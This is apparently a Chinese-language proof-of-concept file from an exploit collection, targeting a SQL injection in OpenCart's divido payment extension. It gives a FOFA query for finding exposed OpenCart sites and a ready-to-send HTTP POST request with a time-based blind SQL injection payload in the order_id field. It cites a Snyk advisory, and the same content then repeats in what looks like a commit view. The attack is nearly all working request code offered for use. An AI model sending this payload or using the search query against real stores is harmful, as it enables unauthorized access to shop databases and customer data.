POC/wpoc/OpenCart/OpenCart开源电子商务平台divido.php存在SQL注入漏洞.md

## OpenCart开源电子商务平台divido.php存在SQL注入漏洞

## fofa

```
app="OpenCart-开源免费PHP商城"
```

## poc

```
POST /index.php?route=extension/payment/divido/update HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/json
content-length: 44

{"status":true,"metadata":{"order_id":"1 AND (SELECT 6684 FROM (SELECT(SLEEP(5)))mUHr)"}}
```

![image-20240628175420361](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406281754398.png)

## 漏洞来源

- https://security.snyk.io/vuln/SNYK-PHP-OPENCARTOPENCART-7266565
first commit 2025-03-04 23:12:57 +08:00			`## OpenCart开源电子商务平台divido.php存在SQL注入漏洞`

			`## fofa`

			```
			`app="OpenCart-开源免费PHP商城"`
			```

			`## poc`

			```
			`POST /index.php?route=extension/payment/divido/update HTTP/1.1`
			`Host: localhost`
			`User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8`
			`Accept-Language: en-GB,en;q=0.5`
			`Connection: keep-alive`
			`Upgrade-Insecure-Requests: 1`
			`Content-Type: application/json`
			`content-length: 44`

			`{"status":true,"metadata":{"order_id":"1 AND (SELECT 6684 FROM (SELECT(SLEEP(5)))mUHr)"}}`
			```

			`![image-20240628175420361](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406281754398.png)`

			`## 漏洞来源`

			`- https://security.snyk.io/vuln/SNYK-PHP-OPENCARTOPENCART-7266565`